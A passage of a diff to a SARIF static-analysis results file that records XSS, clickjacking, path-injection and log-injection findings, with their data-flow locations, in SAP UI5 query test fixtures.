"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 9, - "startColumn" : 9, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6152b8f74a1abdf5:1", - "primaryLocationStartColumnFingerprint" : "0" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 145 } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 28, - "startColumn" : 34, - "endColumn" : 66 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b01bd23ca3666824:1", - "primaryLocationStartColumnFingerprint" : "25" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 146 } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7fe81114896a63c:1", - "primaryLocationStartColumnFingerprint" : "0" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 147 } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "df700c15dad274b2:1", - "primaryLocationStartColumnFingerprint" : "0" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 148 } }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "68e5ff83e2198ff5:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 215 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b79de9dff4d8f842:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "de27f6d546a116e8:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "62d5a4db56a18502:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 176 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "751ece7cb6fd18f7:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "191c273ff0751536:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... 